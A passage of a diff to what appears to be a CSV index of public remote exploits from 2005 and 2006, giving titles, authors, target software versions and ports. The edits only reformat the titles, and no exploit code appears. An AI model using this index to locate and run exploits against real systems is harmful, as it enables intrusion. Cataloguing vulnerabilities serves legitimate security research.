(Metasploit)",2005-08-12,Metasploit,windows,remote,143 1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)",2005-08-12,Metasploit,windows,remote,8008 1167,platforms/solaris/remote/1167.pm,"Solaris 10 LPD - Arbitrary File Delete Exploit (Metasploit)",2005-08-19,Optyx,solaris,remote,0 -1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 - (Expires Header) Remote Buffer Overflow",2005-08-22,c0ntex,linux,remote,0 +1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 - Expires Header Remote Buffer Overflow",2005-08-22,c0ntex,linux,remote,0 1178,platforms/windows/remote/1178.c,"Microsoft IIS 5.0 - '500-100.asp' Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (Spanish) (MS05-039)",2005-08-25,RoMaNSoFt,windows,remote,445 1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French) (MS05-039)",2005-08-25,"Fabrice Mourron",windows,remote,445 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/Denial of Service",2005-08-29,"Luigi Auriemma",windows,remote,0 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow (2)",2005-08-30,basher13,windows,remote,80 1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager 7.50 - Remote Exploit",2005-08-30,Lympex,multiple,remote,0 -1190,platforms/windows/remote/1190.c,"DameWare Mini Remote Control 4.0 < 4.9 - (Client Agent) Remote Exploit",2005-08-31,jpno5,windows,remote,6129 +1190,platforms/windows/remote/1190.c,"DameWare Mini Remote Control 4.0 < 4.9 - Client Agent Remote Exploit",2005-08-31,jpno5,windows,remote,6129 1193,platforms/windows/remote/1193.pl,"Free SMTP Server 2.2 - Spam Filter",2005-09-02,basher13,windows,remote,0 1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager 1.2 - Command Execution",2005-09-07,basher13,windows,remote,0 1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 - 'Search' Remote Format String",2005-09-10,"Clément Lecigne",linux,remote,143 @@ -9673,7 +9678,7 @@ id,file,description,date,author,platform,type,port 1231,platforms/linux/remote/1231.pl,"WzdFTPD 0.5.4 - Remote Command Execution",2005-09-24,kingcope,linux,remote,21 1232,platforms/linux/remote/1232.c,"RealPlayer/Helix Player (Linux) - Remote Format String",2005-09-26,c0ntex,linux,remote,0 1234,platforms/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 (FreeBSD) - 'Search' Remote Format String",2005-09-26,"Angelo Rosiello",bsd,remote,143 -1238,platforms/linux/remote/1238.c,"Prozilla 1.3.7.4 - (ftpsearch) Results Handling Buffer Overflow",2005-10-02,taviso,linux,remote,8080 +1238,platforms/linux/remote/1238.c,"Prozilla 1.3.7.4 - 'ftpsearch' Results Handling Buffer Overflow",2005-10-02,taviso,linux,remote,8080 1242,platforms/linux/remote/1242.pl,"Xine-Lib 1.1 - 'Media Player Library' Remote Format String",2005-10-10,"Ulf Harnhammar",linux,remote,0 1243,platforms/windows/remote/1243.c,"CA iTechnology iGateway - 'Debug Mode' Remote Buffer Overflow",2005-10-10,egm,windows,remote,5250 1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - 'admin_styles.php' Remote Command Execution",2005-10-11,RusH,linux,remote,0 @@ -9682,16 +9687,16 @@ id,file,description,date,author,platform,type,port 1260,platforms/windows/remote/1260.pm,"Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,80 1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM 'log_security()' Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105 -1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",multiple,remote,13722 -1264,platforms/win_x86/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",win_x86,remote,13722 -1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",osx,remote,13722 +1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Exploit",2005-10-20,"Kevin Finisterre",multiple,remote,13722 +1264,platforms/win_x86/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Exploit",2005-10-20,"Kevin Finisterre",win_x86,remote,13722 +1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote Exploit",2005-10-20,"Kevin Finisterre",osx,remote,13722 1272,platforms/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow",2005-10-25,rd,linux,remote,0 1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a - Buffer Overflow Download Shellcode Exploit",2005-10-29,ATmaCA,windows,remote,0 1279,platforms/windows/remote/1279.pm,"Snort 2.4.2 - BackOrifice Remote Buffer Overflow (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0 1288,platforms/linux/remote/1288.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (port bind)",2005-11-02,xwings,linux,remote,0 -1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0 -1291,platforms/lin_x86/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",lin_x86,remote,0 -1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - (SITE) Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 +1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - 'friendsd2' Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0 +1291,platforms/lin_x86/remote/1291.pl,"gpsdrive 2.09 (x86) - 'friendsd2' Remote Format String",2005-11-04,"Kevin Finisterre",lin_x86,remote,0 +1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - 'MKD'/'CWD' Remote Code Execution",2005-11-05,kingcope,linux,remote,21 1313,platforms/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0 1314,platforms/linux/remote/1314.rb,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (4)",2005-11-11,xwings,linux,remote,0 @@ -9708,12 +9713,12 @@ id,file,description,date,author,platform,type,port 1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b - Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - 'EXAMINE' Buffer Overflow",2005-12-19,muts,windows,remote,0 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - 'IMAPd' Remote Overflow",2005-12-20,muts,windows,remote,143 -1381,platforms/windows/remote/1381.pm,"Golden FTP Server 1.92 - (APPE) Remote Overflow (Metasploit)",2005-12-20,redsand,windows,remote,21 +1381,platforms/windows/remote/1381.pm,"Golden FTP Server 1.92 - 'APPE' Remote Overflow (Metasploit)",2005-12-20,redsand,windows,remote,21 1391,platforms/windows/remote/1391.pm,"Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)",2005-12-27,"H D Moore",windows,remote,0 -1408,platforms/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - (Host) Remote Stack/SEH Overflow",2006-01-07,FistFuXXer,windows,remote,80 -1413,platforms/windows/remote/1413.c,"eStara SoftPhone 3.0.1.46 - (SIP) Remote Buffer Overflow (1)",2006-01-12,ZwelL,windows,remote,0 -1414,platforms/windows/remote/1414.pl,"eStara SoftPhone 3.0.1.46 - (SIP) Remote Buffer Overflow (2)",2006-01-12,kokanin,windows,remote,5060 -1417,platforms/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 - (FTP) Remote System Access Exploit",2006-01-14,kokanin,windows,remote,22003 +1408,platforms/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack/SEH Overflow",2006-01-07,FistFuXXer,windows,remote,80 +1413,platforms/windows/remote/1413.c,"eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (1)",2006-01-12,ZwelL,windows,remote,0 +1414,platforms/windows/remote/1414.pl,"eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (2)",2006-01-12,kokanin,windows,remote,5060 +1417,platforms/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 - 'FTP' Remote System Access Exploit",2006-01-14,kokanin,windows,remote,22003 1420,platforms/windows/remote/1420.c,"Microsoft Windows - Metafile '.WMF' Arbitrary File Download (Generator)",2006-01-15,darkeagle,windows,remote,0 1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow",2006-01-16,"Patrick Thomassen",windows,remote,13701 1448,platforms/windows/remote/1448.pl,"KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC)",2006-01-25,"Critical Security",windows,remote,0 @@ -9723,10 +9728,10 @@ id,file,description,date,author,platform,type,port 1460,platforms/windows/remote/1460.pm,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)",2006-01-31,"H D Moore",windows,remote,0 1462,platforms/windows/remote/1462.cpp,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)",2006-01-31,HolyGhost,windows,remote,21 1463,platforms/windows/remote/1463.pm,"SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)",2006-02-01,y0,windows,remote,21 -1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 - (rcpt to) Remote Buffer Overflow",2006-02-03,"securma massine",windows,remote,25 +1466,platforms/windows/remote/1466.pl,"eXchange POP3 5.0.050203 - rcpt to Remote Buffer Overflow",2006-02-03,"securma massine",windows,remote,25 1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 (Linux) - 'location.QueryInterface()' Code Execution (Metasploit)",2006-02-07,"H D Moore",linux,remote,0 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 (OSX) - 'location.QueryInterface()' Code Execution (Metasploit)",2006-02-08,"H D Moore",osx,remote,0 -1486,platforms/linux/remote/1486.c,"Power Daemon 2.0.2 - (WHATIDO) Remote Format String",2006-02-10,"Gotfault Security",linux,remote,532 +1486,platforms/linux/remote/1486.c,"Power Daemon 2.0.2 - 'WHATIDO' Remote Format String",2006-02-10,"Gotfault Security",linux,remote,532 1487,platforms/linux/remote/1487.c,"OpenVMPSd 1.3 - Remote Format String",2006-02-10,"Gotfault Security",linux,remote,1589 1502,platforms/windows/remote/1502.py,"Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (2)",2006-02-16,redsand,windows,remote,0 1504,platforms/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)",2006-02-17,"H D Moore",windows,remote,0 @@ -9736,30 +9741,30 @@ id,file,description,date,author,platform,type,port 1520,platforms/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow (MS06-006) (3)",2006-02-22,"Matthew Murphy",windows,remote,0 1536,platforms/windows/remote/1536.pm,"Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote Exploit (Metasploit)",2006-02-28,"H D Moore",windows,remote,0 1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall 2.1.4 - Remote Authentication Packet Overflow (Metasploit)",2006-02-28,y0,windows,remote,44334 -1565,platforms/windows/remote/1565.pl,"RevilloC MailServer 1.21 - (USER) Remote Buffer Overflow (PoC)",2006-03-07,"securma massine",windows,remote,110 -1574,platforms/linux/remote/1574.c,"PeerCast 0.1216 - (nextCGIarg) Remote Buffer Overflow (1)",2006-03-11,prdelka,linux,remote,7144 -1578,platforms/linux/remote/1578.c,"PeerCast 0.1216 - (nextCGIarg) Remote Buffer Overflow (2)",2006-03-12,darkeagle,linux,remote,7144 +1565,platforms/windows/remote/1565.pl,"RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow (PoC)",2006-03-07,"securma massine",windows,remote,110 +1574,platforms/linux/remote/1574.c,"PeerCast 0.1216 - 'nextCGIarg' Remote Buffer Overflow (1)",2006-03-11,prdelka,linux,remote,7144 +1578,platforms/linux/remote/1578.c,"PeerCast 0.1216 - 'nextCGIarg' Remote Buffer Overflow (2)",2006-03-12,darkeagle,linux,remote,7144 1582,platforms/linux/remote/1582.c,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",2006-03-13,landser,linux,remote,13327 -1583,platforms/osx/remote/1583.pl,"Apple Mac OSX 10.4.5 Mail.app - (Real Name) Buffer Overflow",2006-03-13,"Kevin Finisterre",osx,remote,25 +1583,platforms/osx/remote/1583.pl,"Apple Mac OSX 10.4.5 Mail.app - Real Name Buffer Overflow",2006-03-13,"Kevin Finisterre",osx,remote,25 1592,platforms/windows/remote/1592.c,"Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (1)",2006-03-19,pLL,windows,remote,0 -1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - (Error Messages) Remote Buffer Overflow",2006-03-22,"esca zoo",multiple,remote,11000 -1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer - (createTextRang) Remote Code Execution",2006-03-23,darkeagle,windows,remote,0 +1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - Error Messages Remote Buffer Overflow",2006-03-22,"esca zoo",multiple,remote,11000 +1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer - 'createTextRang' Remote Code Execution",2006-03-23,darkeagle,windows,remote,0 1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer - 'createTextRang' Download Shellcode Exploit (1)",2006-03-23,ATmaCA,windows,remote,0 -1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer - (createTextRang) Remote Exploit (Metasploit)",2006-04-01,"Randy Flood",windows,remote,0 +1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer - 'createTextRang' Remote Exploit (Metasploit)",2006-04-01,"Randy Flood",windows,remote,0 1626,platforms/windows/remote/1626.pm,"PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144 -1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 +1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer - 'createTextRang' Download Shellcode Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 1664,platforms/windows/remote/1664.py,"Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Buffer Overflow",2006-04-11,"Paul Haas",windows,remote,0 1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)",2006-04-15,"H D Moore",novell,remote,8300 -1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit)",2006-04-15,Metasploit,windows,remote,8080 +1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - WebConsole Remote Stack Overflow (Metasploit)",2006-04-15,Metasploit,windows,remote,8080 1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x - Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004 1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - GET Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0 1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - 'parse_xml.cgi' Code Execution",2003-02-24,FOX_MULDER,osx,remote,0 1741,platforms/linux/remote/1741.c,"MySQL 5.0.20 - COM_TABLE_DUMP Memory Leak/Remote Buffer Overflow",2006-05-02,"Stefano Di Paola",linux,remote,3306 1742,platforms/linux/remote/1742.c,"MySQL 4.1.18/5.0.20 - Local/Remote Information Leakage Exploit",2006-05-02,"Stefano Di Paola",linux,remote,0 1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - 'R_RemapShader()' Remote Client Buffer Overflow",2006-05-05,landser,linux,remote,0 -1776,platforms/windows/remote/1776.c,"Medal of Honor - (getinfo) Remote Buffer Overflow",2006-05-10,RunningBon,windows,remote,12203 +1776,platforms/windows/remote/1776.c,"Medal of Honor - 'getinfo' Remote Buffer Overflow",2006-05-10,RunningBon,windows,remote,12203 1787,platforms/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",windows,remote,22 -1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - (Validation) Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote,0 +1788,platforms/windows/remote/1788.pm,"PuTTy.exe 0.53 - Validation Remote Buffer Overflow (Metasploit)",2006-05-15,y0,windows,remote,0 1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass",2006-05-16,redsand,multiple,remote,5900 1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",multiple,remote,5900 1799,platforms/multiple/remote/1799.txt,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Scanner",2006-05-17,class101,multiple,remote,0 @@ -9767,7 +9772,7 @@ id,file,description,date,author,platform,type,port 1862,platforms/cgi/remote/1862.c,"iShopCart - 'vGetPost()' Remote Buffer Overflow (CGI)",2006-06-02,K-sPecial,cgi,remote,0 1885,platforms/windows/remote/1885.pl,"QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow",2006-06-07,kingcope,windows,remote,80 1889,platforms/hardware/remote/1889.txt,"D-Link DWL Series Access-Point 2.10na - Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0 -1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow",2006-06-12,h07,windows,remote,0 +1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow",2006-06-12,h07,windows,remote,0 1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,windows,remote,0 1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)",2006-06-22,"H D Moore",windows,remote,445 1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,windows,remote,445 @@ -9776,16 +9781,16 @@ id,file,description,date,author,platform,type,port 2017,platforms/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)",2006-07-15,UmZ,multiple,remote,10000 2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian _pagvac_ Pastor",hardware,remote,0 2047,platforms/windows/remote/2047.pl,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (1)",2006-07-20,"Jacopo Cervini",windows,remote,0 -2048,platforms/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - (JBoss) Remote Code Execution",2006-07-20,"Jon Hart",hardware,remote,0 -2052,platforms/windows/remote/2052.sh,"Microsoft Internet Explorer - (MDAC) Remote Code Execution (MS06-014)",2006-07-21,redsand,windows,remote,0 +2048,platforms/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - 'JBoss' Remote Code Execution",2006-07-20,"Jon Hart",hardware,remote,0 +2052,platforms/windows/remote/2052.sh,"Microsoft Internet Explorer - MDAC Remote Code Execution (MS06-014)",2006-07-21,redsand,windows,remote,0 2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (2)",2006-07-21,bannedit,multiple,remote,110 2054,platforms/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0 2061,platforms/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing",2006-07-23,"ScanAlert Security",multiple,remote,0 -2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi - (CSeq) Remote Buffer Overflow",2006-07-24,"Jacopo Cervini",windows,remote,5060 +2070,platforms/windows/remote/2070.pl,"SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow",2006-07-24,"Jacopo Cervini",windows,remote,5060 2074,platforms/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)",2006-07-26,ri0t,windows,remote,10616 2075,platforms/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)",2006-07-26,ri0t,windows,remote,0 2076,platforms/windows/remote/2076.pl,"AIM Triton 1.0.4 - 'SipXtapi' Remote Buffer Overflow (PoC)",2006-07-26,c0rrupt,windows,remote,5061 -2079,platforms/windows/remote/2079.pl,"eIQnetworks ESA - (Syslog Server) Remote Buffer Overflow",2006-07-27,"Kevin Finisterre",windows,remote,12345 +2079,platforms/windows/remote/2079.pl,"eIQnetworks ESA - Syslog Server Remote Buffer Overflow",2006-07-27,"Kevin Finisterre",windows,remote,12345 2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616 2082,platforms/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution (PoC)",2006-07-28,"H D Moore",multiple,remote,0 2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0 @@ -9795,34 +9800,34 @@ id,file,description,date,author,platform,type,port 2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",windows,remote,0 2185,platforms/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)",2006-08-14,K-sPecial,linux,remote,110 2223,platforms/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139 -2233,platforms/windows/remote/2233.c,"Texas Imperial Software WFTPD 3.23 - (SIZE) Remote Buffer Overflow",2006-08-21,h07,windows,remote,21 -2234,platforms/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - (PASS) Remote Exploit (PoC)",2006-08-21,h07,windows,remote,21 +2233,platforms/windows/remote/2233.c,"Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow",2006-08-21,h07,windows,remote,21 +2234,platforms/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - 'PASS' Remote Exploit (PoC)",2006-08-21,h07,windows,remote,21 2258,platforms/windows/remote/2258.py,"Alt-N MDaemon POP3 Server < 9.06 - 'USER' Remote Heap Overflow",2006-08-26,muts,windows,remote,110 2265,platforms/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445 2274,platforms/linux/remote/2274.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)",2006-08-29,Expanders,linux,remote,0 -2276,platforms/windows/remote/2276.pm,"IBM eGatherer 3.20.0284.0 - (ActiveX) Remote Code Execution (Metasploit)",2006-08-29,"Francisco Amato",windows,remote,0 +2276,platforms/windows/remote/2276.pm,"IBM eGatherer 3.20.0284.0 - ActiveX Remote Code Execution (Metasploit)",2006-08-29,"Francisco Amato",windows,remote,0 2277,platforms/windows/remote/2277.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (2)",2006-08-29,psylocn,windows,remote,0 -2283,platforms/windows/remote/2283.c,"TIBCO Rendezvous 7.4.11 - (add router) Remote Buffer Overflow",2006-09-01,"Andres Tarasco",windows,remote,0 +2283,platforms/windows/remote/2283.c,"TIBCO Rendezvous 7.4.11 - add router Remote Buffer Overflow",2006-09-01,"Andres Tarasco",windows,remote,0 2320,platforms/windows/remote/2320.txt,"IBM Director < 5.10 - 'Redirect.bat' Directory Traversal",2006-09-07,"Daniel Clemens",windows,remote,411 -2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - (SoftParserFileXml) Remote Code Execution",2006-09-08,rgod,windows,remote,80 +2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - 'SoftParserFileXml' Remote Code Execution",2006-09-08,rgod,windows,remote,80 2345,platforms/windows/remote/2345.pl,"Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2)",2006-09-11,"Jacopo Cervini",windows,remote,143 2355,platforms/windows/remote/2355.pm,"Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 2358,platforms/windows/remote/2358.c,"Microsoft Internet Explorer - COM Object Remote Heap Overflow",2006-09-13,nop,windows,remote,0 -2401,platforms/windows/remote/2401.c,"Ipswitch WS_FTP LE 5.08 - (PASV Response) Remote Buffer Overflow",2006-09-20,h07,windows,remote,0 -2403,platforms/windows/remote/2403.c,"Microsoft Internet Explorer - (VML) Remote Buffer Overflow",2006-09-20,nop,windows,remote,0 -2408,platforms/windows/remote/2408.pl,"Microsoft Internet Explorer (Windows XP SP1) - (VML) Remote Buffer Overflow",2006-09-21,"Trirat Puttaraksa",windows,remote,0 -2425,platforms/windows/remote/2425.html,"Microsoft Internet Explorer (Windows XP SP2) - (VML) Remote Buffer Overflow",2006-09-24,jamikazu,windows,remote,0 +2401,platforms/windows/remote/2401.c,"Ipswitch WS_FTP LE 5.08 - PASV Response Remote Buffer Overflow",2006-09-20,h07,windows,remote,0 +2403,platforms/windows/remote/2403.c,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow",2006-09-20,nop,windows,remote,0 +2408,platforms/windows/remote/2408.pl,"Microsoft Internet Explorer (Windows XP SP1) - 'VML' Remote Buffer Overflow",2006-09-21,"Trirat Puttaraksa",windows,remote,0 +2425,platforms/windows/remote/2425.html,"Microsoft Internet Explorer (Windows XP SP2) - 'VML' Remote Buffer Overflow",2006-09-24,jamikazu,windows,remote,0 2426,platforms/windows/remote/2426.pl,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",windows,remote,0 2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)",2006-09-27,"H D Moore",windows,remote,0 2445,platforms/windows/remote/2445.c,"NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow",2006-09-27,h07,windows,remote,80 2448,platforms/windows/remote/2448.html,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (HTML)",2006-09-28,jamikazu,windows,remote,0 2458,platforms/windows/remote/2458.pl,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (1)",2006-09-29,"YAG KOHHA",windows,remote,0 2460,platforms/windows/remote/2460.c,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (2)",2006-09-29,LukeHack,windows,remote,0 -2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - (Source) Remote Exploit (Metasploit)",2006-10-01,muts,windows,remote,81 +2467,platforms/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - Source Remote Exploit (Metasploit)",2006-10-01,muts,windows,remote,81 2482,platforms/windows/remote/2482.pl,"SHTTPD 1.34 - 'POST' Remote Buffer Overflow",2006-10-05,SkOd,windows,remote,0 2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC)",2006-10-12,h07,windows,remote,0 2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - 'RCPT' Remote Stack Overflow",2006-10-19,"Greg Linares",windows,remote,25 -2637,platforms/windows/remote/2637.c,"AEP SmartGate 4.3b - (GET) Arbitrary File Download Exploit",2006-10-24,prdelka,windows,remote,143 +2637,platforms/windows/remote/2637.c,"AEP SmartGate 4.3b - 'GET' Arbitrary File Download Exploit",2006-10-24,prdelka,windows,remote,143 2638,platforms/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote Exploit",2006-10-24,prdelka,hardware,remote,0 2649,platforms/windows/remote/2649.c,"QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (1)",2006-10-25,Expanders,windows,remote,25 2651,platforms/windows/remote/2651.c,"MiniHTTPServer Web Forum & File Sharing Server 4.0 